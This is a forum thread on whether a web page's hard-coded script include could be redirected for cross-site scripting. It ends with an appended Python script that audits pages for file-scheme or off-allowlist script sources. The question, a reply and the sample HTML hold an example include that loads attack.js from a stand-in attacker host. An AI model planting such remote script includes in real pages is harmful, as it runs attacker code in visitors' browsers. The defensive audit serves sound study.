Javascript XSS vulnerability
Just a thought I had, but I'm not too good with Javascript or Javascript vulnerabilities, though I know the basics pretty well. Anyway, theoretically let's say there is a web page that executes a script when the web page loads, from a separate directory on the server, so that the HTML code would look like this:
<script src="file:///C:/Javascripts/MyScript.js">
To me… this just seems very vulnerable to an XSS attack if you can change the src, for example:
<script src="http://www.attacksite.com/attack.js">
But to my knowledge the javascript is hard-coded into the HTML and cannot be changed. Any ideas if you can actually change the path to the script, or am I safe?
You can't change the hard-coded (no variable) settings. Oh, and you're not safe.
Edit: Actually, you can change hard-coded settings if you can regex+replace with some XSS.
Anyway, stop asking and start learning. I advise ha.ckers.org and sla.ckers.org if you want to learn about XSS, and Webappsec in general.
leoneo11 wrote: But to my knowledge the javascript is hard-coded into the HTML and cannot be changed. Any ideas if you can actually change the path to the script, or am I safe?
Both the Javascript and the Javascript include can be changed if you're rendering the page in something that lets you modify the source in place (PHP cURL, C# w/ MSHTML, even Opera should). I used to do this with MSHTML and my last workplace's CMS to automate the page while eliminating those pesky JS pop-ups. HTML and Javascript are both client-side once they're rendered… which is why GreaseMonkey even works.
leoneo11 wrote: Anyway, theoretically let's say there is a web page that executes a script when the web page loads, from a separate directory on the server, so that the HTML code would look like this:
<script src="file:///C:/Javascripts/MyScript.js">
I'd say this wouldn't work, since the javascript is executed on the client's computer and not on the server. It'd rather look like this:
<script src="Javascripts/MyScript.js">
To me… this just seems very vulnerable to an XSS attack if you can change the src, for example:
<script src="http://www.attacksite.com/attack.js">
I understand what you mean, but you can't simply edit a hard coded HTML file just like that. Like spyware said, practical experience is very good. Get training ;)
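A defender-side check for the kind of include the thread argues about, added here as an example (not code from any poster): it parses a page's script tags and flags any src that uses the file: scheme or points at a host outside an allowlist, such as the attacksite.com include above. The sample HTML and the cdn.example.org allowlist entry are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page mirroring the includes discussed in the thread:
# a file:// include, a relative include, a scheme-relative CDN include
# and an external include.
SAMPLE_HTML = """
<html><head>
<script src="file:///C:/Javascripts/MyScript.js"></script>
<script src="Javascripts/MyScript.js"></script>
<script src="//cdn.example.org/lib.js"></script>
<script src="http://www.attacksite.com/attack.js"></script>
<script>console.log("inline");</script>
</head></html>
"""

class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in the document."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src is not None:
                self.sources.append(src)

def classify_script_src(src, allowed_hosts):
    """Return 'ok', 'file-scheme' or 'external' for one script src value."""
    parts = urlsplit(src.strip())
    if parts.scheme.lower() == "file":
        return "file-scheme"
    if not parts.netloc:          # relative URL: served from the page's own origin
        return "ok"
    host = (parts.hostname or "").lower()
    return "ok" if host in allowed_hosts else "external"

def audit_script_sources(html, allowed_hosts=frozenset()):
    """Return (src, verdict) pairs for every script include that is not 'ok'."""
    collector = _ScriptSrcCollector()
    collector.feed(html)
    return [(src, classify_script_src(src, allowed_hosts))
            for src in collector.sources
            if classify_script_src(src, allowed_hosts) != "ok"]

if __name__ == "__main__":
    for src, verdict in audit_script_sources(SAMPLE_HTML, {"cdn.example.org"}):
        print(f"{verdict:12} {src}")
```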